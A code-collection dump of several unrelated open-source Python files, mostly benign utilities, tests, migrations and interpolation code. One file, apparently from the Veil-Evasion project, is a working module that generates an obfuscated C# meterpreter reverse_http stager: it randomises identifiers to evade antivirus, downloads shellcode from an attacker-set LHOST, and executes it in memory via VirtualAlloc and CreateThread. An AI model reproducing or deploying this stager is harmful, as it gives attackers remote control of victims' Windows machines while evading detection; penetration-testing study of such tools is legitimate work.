return "http://%s:%d" % (FLAGS.glance_host, FLAGS.glance_port)
def generate_image_url(image_ref):
"""Generate an image URL from an image_ref."""
return "%s/images/%s" % (generate_glance_url(), image_ref)
@contextlib.contextmanager
def remove_path_on_error(path):
"""Protect code that wants to operate on PATH atomically.
Any exception will cause PATH to be removed.
"""
try:
yield
except Exception:
with excutils.save_and_reraise_exception():
delete_if_exists(path)
def make_dev_path(dev, partition=None, base='/dev'):
"""Return a path to a particular device.
>>> make_dev_path('xvdc')
/dev/xvdc
>>> make_dev_path('xvdc', 1)
/dev/xvdc1
"""
path = os.path.join(base, dev)
if partition:
path += str(partition)
return path
def total_seconds(td):
"""Local total_seconds implementation for compatibility with python 2.6"""
if hasattr(td, 'total_seconds'):
return td.total_seconds()
else:
return ((td.days * 86400 + td.seconds) * 10 ** 6 +
td.microseconds) / 10.0 ** 6
def sanitize_hostname(hostname):
"""Return a hostname which conforms to RFC-952 and RFC-1123 specs."""
if isinstance(hostname, unicode):
hostname = hostname.encode('latin-1', 'ignore')
hostname = re.sub('[ _]', '-', hostname)
hostname = re.sub('[^\w.-]+', '', hostname)
hostname = hostname.lower()
hostname = hostname.strip('.-')
return hostname
def read_cached_file(filename, cache_info, reload_func=None):
"""Read from a file if it has been modified.
:param cache_info: dictionary to hold opaque cache.
:param reload_func: optional function to be called with data when
file is reloaded due to a modification.
:returns: data from file
"""
mtime = os.path.getmtime(filename)
if not cache_info or mtime != cache_info.get('mtime'):
LOG.debug(_("Reloading cached file %s") % filename)
with open(filename) as fap:
cache_info['data'] = fap.read()
cache_info['mtime'] = mtime
if reload_func:
reload_func(cache_info['data'])
return cache_info['data']
def file_open(*args, **kwargs):
"""Open file
see built-in file() documentation for more details
Note: The reason this is kept in a separate module is to easily
be able to provide a stub module that doesn't alter system
state at all (for unit tests)
"""
return file(*args, **kwargs)
def file_exist(pathname):
"""Check file exist"""
return os.path.isfile(pathname)
def hash_file(file_like_object):
"""Generate a hash for the contents of a file."""
checksum = hashlib.sha1()
for chunk in iter(lambda: file_like_object.read(32768), b''):
checksum.update(chunk)
return checksum.hexdigest()
@contextlib.contextmanager
def temporary_mutation(obj, **kwargs):
"""Temporarily set the attr on a particular object to a given value then
revert when finished.
One use of this is to temporarily set the read_deleted flag on a context
object:
with temporary_mutation(context, read_deleted="yes"):
do_something_that_needed_deleted_objects()
"""
NOT_PRESENT = object()
old_values = {}
for attr, new_value in kwargs.items():
old_values[attr] = getattr(obj, attr, NOT_PRESENT)
setattr(obj, attr, new_value)
try:
yield
finally:
for attr, old_value in old_values.items():
if old_value is NOT_PRESENT:
del obj[attr]
else:
setattr(obj, attr, old_value)
def service_is_up(service):
"""Check whether a service is up based on last heartbeat."""
last_heartbeat = service['updated_at'] or service['created_at']
# Timestamps in DB are UTC.
elapsed = total_seconds(timeutils.utcnow() - last_heartbeat)
return abs(elapsed) <= FLAGS.service_down_time
def generate_mac_address():
"""Generate an Ethernet MAC address."""
# NOTE(vish): We would prefer to use 0xfe here to ensure that linux
# bridge mac addresses don't change, but it appears to
# conflict with libvirt, so we use the next highest octet
# that has the unicast and locally administered bits set
# properly: 0xfa.
# Discussion: https://bugs.launchpad.net/traffic/+bug/921838
mac = [0xfa, 0x16, 0x3e,
random.randint(0x00, 0x7f),
random.randint(0x00, 0xff),
random.randint(0x00, 0xff)]
return ':'.join(map(lambda x: "%02x" % x, mac))
def read_file_as_root(file_path):
"""Secure helper to read file as root."""
try:
out, _err = execute('cat', file_path, run_as_root=True)
return out
except exception.ProcessExecutionError:
raise exception.FileNotFound(file_path=file_path)
@contextlib.contextmanager
def temporary_chown(path, owner_uid=None):
"""Temporarily chown a path.
:params owner_uid: UID of temporary owner (defaults to current user)
"""
if owner_uid is None:
owner_uid = os.getuid()
orig_uid = os.stat(path).st_uid
if orig_uid != owner_uid:
execute('chown', owner_uid, path, run_as_root=True)
try:
yield
finally:
if orig_uid != owner_uid:
execute('chown', orig_uid, path, run_as_root=True)
@contextlib.contextmanager
def tempdir(**kwargs):
tmpdir = tempfile.mkdtemp(**kwargs)
try:
yield tmpdir
finally:
try:
shutil.rmtree(tmpdir)
except OSError, e:
LOG.error(_('Could not remove tmpdir: %s'), str(e))
def strcmp_const_time(s1, s2):
"""Constant-time string comparison.
:params s1: the first string
:params s2: the second string
:return: True if the strings are equal.
This function takes two strings and compares them. It is intended to be
used when doing a comparison for authentication purposes to help guard
against timing attacks.
"""
if len(s1) != len(s2):
return False
result = 0
for (a, b) in zip(s1, s2):
result |= ord(a) ^ ord(b)
return result == 0
def walk_class_hierarchy(clazz, encountered=None):
"""Walk class hierarchy, yielding most derived classes first"""
if not encountered:
encountered = []
for subclass in clazz.__subclasses__():
if subclass not in encountered:
encountered.append(subclass)
# drill down to leaves first
for subsubclass in walk_class_hierarchy(subclass, encountered):
yield subsubclass
yield subclass
class UndoManager(object):
"""Provides a mechanism to facilitate rolling back a series of actions
when an exception is raised.
"""
def __init__(self):
self.undo_stack = []
def undo_with(self, undo_func):
self.undo_stack.append(undo_func)
def _rollback(self):
for undo_func in reversed(self.undo_stack):
undo_func()
def rollback_and_reraise(self, msg=None, **kwargs):
"""Rollback a series of actions then re-raise the exception.
.. note:: (sirp) This should only be called within an
exception handler.
"""
with excutils.save_and_reraise_exception():
if msg:
LOG.exception(msg, **kwargs)
self._rollback()
def ensure_tree(path):
"""Create a directory (and any ancestor directories required)
:param path: Directory to create
"""
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST:
if not os.path.isdir(path):
raise
else:
raise
| fengkaicnic/traffic | traffic/utils.py | Python | apache-2.0 | 44,222 |
"""
Custom-written pure c# meterpreter/reverse_http stager.
Uses basic variable renaming obfuscation.
Module built by @harmj0y
"""
from modules.common import helpers
from modules.common import encryption
import random
class Payload:
def __init__(self):
# required options
self.description = "pure windows/meterpreter/reverse_http stager, no shellcode"
self.language = "cs"
self.extension = "cs"
self.rating = "Excellent"
# options we require user interaction for- format is {Option : [Value, Description]]}
self.required_options = {"LHOST" : ["", "IP of the metasploit handler"],
"LPORT" : ["8080", "Port of the metasploit handler"],
"compile_to_exe" : ["Y", "Compile to an executable"],
"use_arya" : ["N", "Use the Arya crypter"]}
def generate(self):
# imports and namespace setup
payloadCode = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices;\n"
payloadCode += "namespace %s { class %s {\n" % (helpers.randomString(), helpers.randomString())
# code for the randomString() function
randomStringName = helpers.randomString()
bufferName = helpers.randomString()
charsName = helpers.randomString()
t = list("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")
random.shuffle(t)
chars = ''.join(t)
payloadCode += "static string %s(Random r, int s) {\n" %(randomStringName)
payloadCode += "char[] %s = new char[s];\n"%(bufferName)
payloadCode += "string %s = \"%s\";\n" %(charsName, chars)
payloadCode += "for (int i = 0; i < s; i++){ %s[i] = %s[r.Next(%s.Length)];}\n" %(bufferName, charsName, charsName)
payloadCode += "return new string(%s);}\n" %(bufferName)
# code for the checksum8() function
checksum8Name = helpers.randomString()
payloadCode += "static bool %s(string s) {return ((s.ToCharArray().Select(x => (int)x).Sum()) %% 0x100 == 92);}\n" %(checksum8Name)
# code fo the genHTTPChecksum() function
genHTTPChecksumName = helpers.randomString()
baseStringName = helpers.randomString()
randCharsName = helpers.randomString()
urlName = helpers.randomString()
random.shuffle(t)
randChars = ''.join(t)
payloadCode += "static string %s(Random r) { string %s = \"\";\n" %(genHTTPChecksumName,baseStringName)
payloadCode += "for (int i = 0; i < 64; ++i) { %s = %s(r, 3);\n" %(baseStringName,randomStringName)
payloadCode += "string %s = new string(\"%s\".ToCharArray().OrderBy(s => (r.Next(2) %% 2) == 0).ToArray());\n" %(randCharsName,randChars)
payloadCode += "for (int j = 0; j < %s.Length; ++j) {\n" %(randCharsName)
payloadCode += "string %s = %s + %s[j];\n" %(urlName,baseStringName,randCharsName)
payloadCode += "if (%s(%s)) {return %s;}}} return \"9vXU\";}"%(checksum8Name,urlName, urlName)
# code for getData() function
getDataName = helpers.randomString()
strName = helpers.randomString()
webClientName = helpers.randomString()
sName = helpers.randomString()
payloadCode += "static byte[] %s(string %s) {\n" %(getDataName,strName)
payloadCode += "WebClient %s = new System.Net.WebClient();\n" %(webClientName)
payloadCode += "%s.Headers.Add(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\");\n" %(webClientName)
payloadCode += "%s.Headers.Add(\"Accept\", \"*/*\");\n" %(webClientName)
payloadCode += "%s.Headers.Add(\"Accept-Language\", \"en-gb,en;q=0.5\");\n" %(webClientName)
payloadCode += "%s.Headers.Add(\"Accept-Charset\", \"ISO-8859-1,utf-8;q=0.7,*;q=0.7\");\n" %(webClientName)
payloadCode += "byte[] %s = null;\n" %(sName)
payloadCode += "try { %s = %s.DownloadData(%s);\n" %(sName, webClientName, strName)
payloadCode += "if (%s.Length < 100000) return null;}\n" %(sName)
payloadCode += "catch (WebException) {}\n"
payloadCode += "return %s;}\n" %(sName)
# code fo the inject() function to inject shellcode
injectName = helpers.randomString()
sName = helpers.randomString()
funcAddrName = helpers.randomString()
hThreadName = helpers.randomString()
threadIdName = helpers.randomString()
pinfoName = helpers.randomString()
payloadCode += "static void %s(byte[] %s) {\n" %(injectName, sName)
payloadCode += " if (%s != null) {\n" %(sName)
payloadCode += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" %(funcAddrName, sName)
payloadCode += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" %(sName,funcAddrName, sName)
payloadCode += " IntPtr %s = IntPtr.Zero;\n" %(hThreadName)
payloadCode += " UInt32 %s = 0;\n" %(threadIdName)
payloadCode += " IntPtr %s = IntPtr.Zero;\n" %(pinfoName)
payloadCode += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" %(hThreadName, funcAddrName, pinfoName, threadIdName)
payloadCode += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" %(hThreadName)
# code for Main() to launch everything
sName = helpers.randomString()
randomName = helpers.randomString()
payloadCode += "static void Main(){\n"
payloadCode += "Random %s = new Random((int)DateTime.Now.Ticks);\n" %(randomName)
payloadCode += "byte[] %s = %s(\"http://%s:%s/\" + %s(%s));\n" %(sName, getDataName, self.required_options["LHOST"][0],self.required_options["LPORT"][0],genHTTPChecksumName,randomName)
payloadCode += "%s(%s);}\n" %(injectName, sName)
# get 12 random variables for the API imports
r = [helpers.randomString() for x in xrange(12)]
payloadCode += """[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s); } }\n"""%(r[0],r[1],r[2],r[3],r[4],r[5],r[6],r[7],r[8],r[9],r[10],r[11])
if self.required_options["use_arya"][0].lower() == "y":
payloadCode = encryption.arya(payloadCode)
return payloadCode
| codercold/Veil-Evasion | modules/payloads/cs/meterpreter/rev_http.py | Python | gpl-3.0 | 6,639 |
import string, copy
def joinHeaders(first, second, joined, on):
joined.headers = first.headers[:]
mappedHeaders = {}
for header in second.headers:
if header == on:
continue
i = 0
newHeader = header
while newHeader in first.headers:
newHeader = '{0}_{1}'.format(newHeader, i)
i += 1
if i > 0:
mappedHeaders[header] = newHeader
joined.headers.append(newHeader)
return mappedHeaders
def mergeRow(row, toMerge, mappedHeaders):
for header in toMerge:
if header in mappedHeaders:
row[mappedHeaders[header]] = toMerge[header]
else:
row[header] = toMerge[header]
def mergeRows(first, second, joined, on, mappedHeaders):
joined.rows = copy.deepcopy(first.rows)
secondRows = copy.deepcopy(second.rows)
for secondRow in secondRows:
pivot = secondRow[on]
for row in joined.rows:
if row[on] == pivot:
mergeRow(row, secondRow, mappedHeaders)
break
else:
newRow = {}
mergeRow(newRow, secondRow, mappedHeaders)
joined.rows.append(newRow)
class Dataset:
def __init__(self, filename = '', separator=',', header=True):
self.headers = []
self.rows = []
try:
infile = file(filename, 'r')
if header:
self.headers = infile.readline().strip().split(separator)
for line in infile:
row = line.strip().split(separator)
if not header and not self.headers:
self.headers = ["V{0}".format(i) for i in range(len(row))]
self.rows.append({self.headers[i]:row[i] for i in range(len(row))})
infile.close()
except IOError:
pass
def export(self, filename):
outfile = file(filename, 'w')
outfile.write(','.join(self.headers))
for row in self.rows:
outfile.write('\n')
outfile.write(','.join([row[x] for x in self.headers]))
outfile.close()
def join(self, other, on):
"""Join self dataset with another dataset, creating a new dataset.
The original datasets remain unchanged.
The third argument is the header on which to join"""
# check for correct join
if not (on in self.headers or on in other.headers):
print "Error: header '{0}' not found in both collections".format(on)
return None
# create new dataset
joined = Dataset()
# fill new dataset with combined data
mappedHeaders = joinHeaders(self, other, joined, on)
mergeRows(self, other, joined, on, mappedHeaders)
joined.ensureFilled()
# return newly created dataset
return joined
def pivot(self):
"""Pivot this dataset into a new one, discarding current headers, using first column as new headers"""
pivoted = Dataset()
for (index, header) in enumerate(self.headers):
for row in self.rows:
if index == 0:
pivoted.headers.append(row[header])
else:
if len(pivoted.rows) < index:
pivoted.rows.extend([{} for x in range(index - len(pivoted.rows))])
pivoted.rows[index - 1][row[self.headers[0]]] = row[header]
return pivoted
def ensureFilled(self):
for row in self.rows:
for header in self.headers:
if not header in row:
row[header] = None
def append(self, other, ensureFilled = True):
"""Append rows of another dataset to this one, leaving the other dataset unchanged"""
self.rows.extend(other.rows)
self.headers.extend([x for x in other.headers if not x in self.headers])
if(ensureFilled):
self.ensureFilled()
return self
| dwilmer/rcpsp-testing-framework | dataset.py | Python | mit | 3,291 |
# Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import cPickle
from webkitpy.layout_tests.models import test_failures
class TestResult(object):
"""Data object containing the results of a single test."""
@staticmethod
def loads(string):
return cPickle.loads(string)
def __init__(self, test_name, failures=None, test_run_time=None, has_stderr=False, reftest_type=[]):
self.test_name = test_name
self.failures = failures or []
self.test_run_time = test_run_time or 0
self.has_stderr = has_stderr
self.reftest_type = reftest_type
# FIXME: Setting this in the constructor makes this class hard to mutate.
self.type = test_failures.determine_result_type(failures)
def __eq__(self, other):
return (self.test_name == other.test_name and
self.failures == other.failures and
self.test_run_time == other.test_run_time)
def __ne__(self, other):
return not (self == other)
def has_failure_matching_types(self, *failure_classes):
for failure in self.failures:
if type(failure) in failure_classes:
return True
return False
def dumps(self):
return cPickle.dumps(self)
| leighpauls/k2cro4 | third_party/WebKit/Tools/Scripts/webkitpy/layout_tests/models/test_results.py | Python | bsd-3-clause | 2,739 |
import numpy as np
from arthur import constants
def grid(U, V, C, duv, size):
G = np.zeros((size, size), np.complex64)
G.fill(0)
for a1 in range(constants.NUM_ANTS):
for a2 in range(constants.NUM_ANTS):
p = 1.0
if a1 == a2:
p = 0.5
u = U[a1, a2] / duv + size / 2 - 1
v = V[a1, a2] / duv + size / 2 - 1
w = int(np.floor(u))
e = int(np.ceil(u))
s = int(np.floor(v))
n = int(np.ceil(v))
west_power = p - (u - w)
east_power = p - (e - u)
south_power = p - (v - s)
north_power = p - (n - v)
south_west_power = south_power * west_power
north_west_power = north_power * west_power
south_east_power = south_power * east_power
north_east_power = north_power * east_power
G[s, w] += south_west_power * C[a1, a2]
G[n, w] += north_west_power * C[a1, a2]
G[s, e] += south_east_power * C[a1, a2]
G[n, e] += north_east_power * C[a1, a2]
return G
| transientskp/aartfaac-arthur | arthur/gridding.py | Python | gpl-3.0 | 1,118 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2012, 2014, 2015 Martin Raspaud
# Author(s):
# Martin Raspaud <martin.raspaud@smhi.se>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Version file.
"""
__version__ = "0.2.0"
| pytroll/pytroll-db | trolldb/version.py | Python | gpl-3.0 | 832 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.21 on 2020-04-15 08:10
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('gestioneide', '0065_auto_20200403_1657'),
]
operations = [
migrations.CreateModel(
name='AnotacionGrupo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fecha', models.DateField(auto_now_add=True)),
('texto', models.CharField(default=b'', max_length=1000)),
('alumno', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='gestioneide.Grupo')),
('creador', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['-fecha'],
},
),
]
| Etxea/gestioneide | gestioneide/migrations/0066_anotaciongrupo.py | Python | gpl-3.0 | 1,119 |
#!/usr/bin/env python
"""Test that syntax highlighting for USD files works correctly."""
import textwrap
import unittest
from pygments.lexers import UsdLexer
from pygments.token import Name, String, Whitespace
class _Common(unittest.TestCase):
"""A basic class that makes it easier to write unittests."""
def setUp(self):
"""Create a fresh USD lexer class before each test runs."""
self.lexer = UsdLexer()
def _get(self, code):
"""Tokenize the code into its unique parts.
:param code: The USD source code to split up.
:type code: str
:returns: The tokenized pieces.
:rtype: list[:class:`pygments.token._TokenType`]
"""
return list(self.lexer.get_tokens(code))
class Features(_Common):
"""Test that different features of USD highlight as expected."""
def test_asset_path(self):
"""Check that a regular file path highlights correctly."""
for path in [
"@./some/path/to/a/file/foo.usda@",
"@/some/path/to/a/file/foo.usda@",
"@some/path/to/a/file/foo.usda@",
r"@file://SPECI__Z-_ALIZED(syntax_here)?with_arbitrary#)(%*&)\characters.tar.gz@",
]:
expected = [
(String.Interpol, path),
(Whitespace, "\n"),
]
self.assertEqual(expected, self._get(path))
def test_target_absolute(self):
"""Check that SdfPath syntax examples work correctly."""
for code in [
# Absolute paths
"</some/another_one/here>",
"</some/path/here.property_name>",
"</some/path/here>",
# Relative paths
"<../some/another_one/here>",
"<../some/path/here.property_name>",
"<../some/path/here>",
]:
self.assertEqual(
[(Name.Namespace, code), (Whitespace, "\n")], self._get(code),
)
| dscorbett/pygments | tests/test_usd.py | Python | bsd-2-clause | 1,953 |
# -*- coding: utf-8 -*-
"""
Webhook signals
"""
#
# Required for reading files
#
import sys;
reload(sys);
sys.setdefaultencoding("utf8")
from django.core.files import File
from django.core.cache import cache
from django.dispatch import receiver
from django.test import TestCase, Client
from django.core.urlresolvers import reverse_lazy
from django.contrib.contenttypes.models import ContentType
from model_mommy import mommy
from ..services import CrocoDocConnectService
from .models import FakeDocumentObject
import data as crocodoc_data
from dj_crocodoc.models import CrocodocDocument
import dj_crocodoc.signals as crocodoc_signals
import os
import json
import codecs
import httpretty
TEST_PDF_PATH = os.path.join(os.path.dirname(__file__), 'test.pdf')
def GET_FAKE_DOC_OBJECT():
base_object_attachment = FakeDocumentObject()
with codecs.open(TEST_PDF_PATH, mode='r', encoding="ISO8859-1") as filename:
base_object_attachment.my_document_field.save('test.pdf', File(filename))
base_object_attachment.save()
return base_object_attachment
@receiver(crocodoc_signals.crocodoc_comment_create)
@receiver(crocodoc_signals.crocodoc_comment_delete)
@receiver(crocodoc_signals.crocodoc_annotation_highlight)
@receiver(crocodoc_signals.crocodoc_annotation_strikeout)
@receiver(crocodoc_signals.crocodoc_annotation_textbox)
@receiver(crocodoc_signals.crocodoc_annotation_drawing)
def test_crocodoc_webhook_event_recieved(**kwargs):
"""
Test signal listner to handle the signal fired event
"""
cache.set('test_crocodoc_webhook_event_recieved', kwargs.keys())
def _ensure_object_has_correct_values(clazz, obj):
"""
Test we have the right standard values
used in all tests below
"""
clazz.assertEqual(obj.content_object_type, ContentType.objects.get(model='fakedocumentobject', app_label='tests'))
clazz.assertEqual(obj.object_attachment_fieldname, 'my_document_field')
clazz.assertEqual(type(obj.source_object), FakeDocumentObject) # should return the base object that created the request
class BaseContentProvider(TestCase):
def setUp(self):
super(BaseContentProvider, self).setUp()
self.client = Client()
self.document_uuid = 'b15532bb-c227-40f6-939c-a244d123c717'
#
# Create Test document
#
self.user = mommy.make('auth.User',
pk=1, # set pk based on the data.CROCODOC_COMMENT_CREATE 1,Ross C
username='CrocoDoc webhook User',
first_name='Ross',
last_name='C',
email='crocodoc@lawpal.com')
self.attachment = FakeDocumentObject.objects.create(my_document_field='')
ctype = ContentType.objects.get(model=self.attachment.__class__.__name__.lower(), app_label='tests')
self.doc = CrocodocDocument.objects.create(uuid=self.document_uuid,
content_object_type=ctype,
object_id=self.attachment.pk,
object_attachment_fieldname='my_document_field')
class WebhookTest(BaseContentProvider):
"""
Test the basic webhook callbacks (emulate a POST form crocodoc)
"""
endpoint = reverse_lazy('crocodoc_webhook_callback')
EXPECTED_KEYS = ['target', 'crocodoc_event', 'signal', 'uuid', 'content', 'user_info', 'verb', 'attachment_name', 'document', 'sender']
def send(self, data):
"""
crocodoc wrap all webhooks in a payload object for some reason
and a basic post
"""
return self.client.post(self.endpoint, {"payload": json.dumps(data)})
def test_comment_create(self):
resp = self.send(data=crocodoc_data.CROCODOC_COMMENT_CREATE)
self.assertItemsEqual(cache.get('test_crocodoc_webhook_event_recieved'), self.EXPECTED_KEYS)
self.assertEqual(json.loads(resp.content), {"details": [True, True]})
def test_annotation_highlight(self):
resp = self.send(data=crocodoc_data.CROCODOC_ANNOTATION_HIGHLIGHT)
self.assertItemsEqual(cache.get('test_crocodoc_webhook_event_recieved'), self.EXPECTED_KEYS)
self.assertEqual(json.loads(resp.content), {"details": [True]})
def test_annotation_textbox(self):
resp = self.send(data=crocodoc_data.CROCODOC_ANNOTATION_TEXTBOX)
self.assertItemsEqual(cache.get('test_crocodoc_webhook_event_recieved'), self.EXPECTED_KEYS)
self.assertEqual(json.loads(resp.content), {"details": [True]})
class IncomingSignalTest(TestCase):
"""
Test we can issue a signal and have that signal provide us with an appropriate model
"""
subject = crocodoc_signals.send_to_crocodoc
@httpretty.activate
def test_signal_provides_a_new_model(self):
#
# Crocdoc
#
httpretty.register_uri(httpretty.POST, "https://crocodoc.com/api/v2/document/upload",
body='{"success": true, "uuid": "b15532bb-c227-40f6-939c-a244d123c717"}',
status=200)
base_object_attachment = GET_FAKE_DOC_OBJECT()
self.assertEqual(CrocodocDocument.objects.all().count(), 0)
self.subject.send(sender=self,
document_object=base_object_attachment,
app_label='tests',
field_name='my_document_field')
# Success, we Created a new CrocodocDocument object from the signal
self.assertEqual(CrocodocDocument.objects.all().count(), 1)
obj = CrocodocDocument.objects.all().first()
self.assertEqual(str(obj.uuid), 'b15532bb-c227-40f6-939c-a244d123c717') # as we have yet to call the upload process on it
_ensure_object_has_correct_values(clazz=self, obj=obj)
class CrocoDocConnectServiceTest(TestCase):
"""
Test we can use the CrocoDocConnectService directly
"""
subject = CrocoDocConnectService
@httpretty.activate
def test_service_provides_a_model_with_upload_immediately_false(self):
"""
Note the CrocoDocConnectService will not upload_immediately unless u
specify upload_immediately=True
"""
#
# Crocdoc
#
httpretty.register_uri(httpretty.POST, "https://crocodoc.com/api/v2/document/upload",
body='{"success": true, "uuid": "b15532bb-c227-40f6-939c-a244d123c717"}',
status=200)
base_object_attachment = GET_FAKE_DOC_OBJECT()
self.assertEqual(CrocodocDocument.objects.all().count(), 0)
self.subject(document_object=base_object_attachment, app_label='tests', field_name='my_document_field')
# Success, we Created a new CrocodocDocument object from the signal
self.assertEqual(CrocodocDocument.objects.all().count(), 1)
obj = CrocodocDocument.objects.all().first()
self.assertEqual(obj.uuid, None) # Service does not upload right away
_ensure_object_has_correct_values(clazz=self, obj=obj)
@httpretty.activate
def test_service_provides_a_model_with_upload_immediately_true(self):
"""
Note the CrocoDocConnectService will not upload_immediately unless u
specify upload_immediately=True
"""
#
# Crocdoc
#
httpretty.register_uri(httpretty.POST, "https://crocodoc.com/api/v2/document/upload",
body='{"success": true, "uuid": "b15532bb-c227-40f6-939c-a244d123c717"}',
status=200)
base_object_attachment = GET_FAKE_DOC_OBJECT()
self.assertEqual(CrocodocDocument.objects.all().count(), 0)
service = self.subject(document_object=base_object_attachment,
app_label='tests',
field_name='my_document_field',
upload_immediately=True)
# Success, we Created a new CrocodocDocument object from the signal
self.assertEqual(CrocodocDocument.objects.all().count(), 1)
obj = CrocodocDocument.objects.all().first()
self.assertEqual(str(obj.uuid), 'b15532bb-c227-40f6-939c-a244d123c717') # Service does not upload right away
_ensure_object_has_correct_values(clazz=self, obj=obj)
| rosscdh/django-crocodoc | dj_crocodoc/tests/signals.py | Python | gpl-2.0 | 8,364 |
"""Interpolation algorithms using piecewise cubic polynomials."""
import numpy as np
from . import PPoly
from .polyint import _isscalar
from scipy.linalg import solve_banded, solve
__all__ = ["CubicHermiteSpline", "PchipInterpolator", "pchip_interpolate",
"Akima1DInterpolator", "CubicSpline"]
def prepare_input(x, y, axis, dydx=None):
"""Prepare input for cubic spline interpolators.
All data are converted to numpy arrays and checked for correctness.
Axes equal to `axis` of arrays `y` and `dydx` are rolled to be the 0th
axis. The value of `axis` is converted to lie in
[0, number of dimensions of `y`).
"""
x, y = map(np.asarray, (x, y))
if np.issubdtype(x.dtype, np.complexfloating):
raise ValueError("`x` must contain real values.")
x = x.astype(float)
if np.issubdtype(y.dtype, np.complexfloating):
dtype = complex
else:
dtype = float
if dydx is not None:
dydx = np.asarray(dydx)
if y.shape != dydx.shape:
raise ValueError("The shapes of `y` and `dydx` must be identical.")
if np.issubdtype(dydx.dtype, np.complexfloating):
dtype = complex
dydx = dydx.astype(dtype, copy=False)
y = y.astype(dtype, copy=False)
axis = axis % y.ndim
if x.ndim != 1:
raise ValueError("`x` must be 1-dimensional.")
if x.shape[0] < 2:
raise ValueError("`x` must contain at least 2 elements.")
if x.shape[0] != y.shape[axis]:
raise ValueError("The length of `y` along `axis`={0} doesn't "
"match the length of `x`".format(axis))
if not np.all(np.isfinite(x)):
raise ValueError("`x` must contain only finite values.")
if not np.all(np.isfinite(y)):
raise ValueError("`y` must contain only finite values.")
if dydx is not None and not np.all(np.isfinite(dydx)):
raise ValueError("`dydx` must contain only finite values.")
dx = np.diff(x)
if np.any(dx <= 0):
raise ValueError("`x` must be strictly increasing sequence.")
y = np.rollaxis(y, axis)
if dydx is not None:
dydx = np.rollaxis(dydx, axis)
return x, dx, y, axis, dydx
class CubicHermiteSpline(PPoly):
"""Piecewise-cubic interpolator matching values and first derivatives.
The result is represented as a `PPoly` instance.
Parameters
----------
x : array_like, shape (n,)
1-D array containing values of the independent variable.
Values must be real, finite and in strictly increasing order.
y : array_like
Array containing values of the dependent variable. It can have
arbitrary number of dimensions, but the length along ``axis``
(see below) must match the length of ``x``. Values must be finite.
dydx : array_like
Array containing derivatives of the dependent variable. It can have
arbitrary number of dimensions, but the length along ``axis``
(see below) must match the length of ``x``. Values must be finite.
axis : int, optional
Axis along which `y` is assumed to be varying. Meaning that for
``x[i]`` the corresponding values are ``np.take(y, i, axis=axis)``.
Default is 0.
extrapolate : {bool, 'periodic', None}, optional
If bool, determines whether to extrapolate to out-of-bounds points
based on first and last intervals, or to return NaNs. If 'periodic',
periodic extrapolation is used. If None (default), it is set to True.
Attributes
----------
x : ndarray, shape (n,)
Breakpoints. The same ``x`` which was passed to the constructor.
c : ndarray, shape (4, n-1, ...)
Coefficients of the polynomials on each segment. The trailing
dimensions match the dimensions of `y`, excluding ``axis``.
For example, if `y` is 1-D, then ``c[k, i]`` is a coefficient for
``(x-x[i])**(3-k)`` on the segment between ``x[i]`` and ``x[i+1]``.
axis : int
Interpolation axis. The same axis which was passed to the
constructor.
Methods
-------
__call__
derivative
antiderivative
integrate
roots
See Also
--------
Akima1DInterpolator : Akima 1D interpolator.
PchipInterpolator : PCHIP 1-D monotonic cubic interpolator.
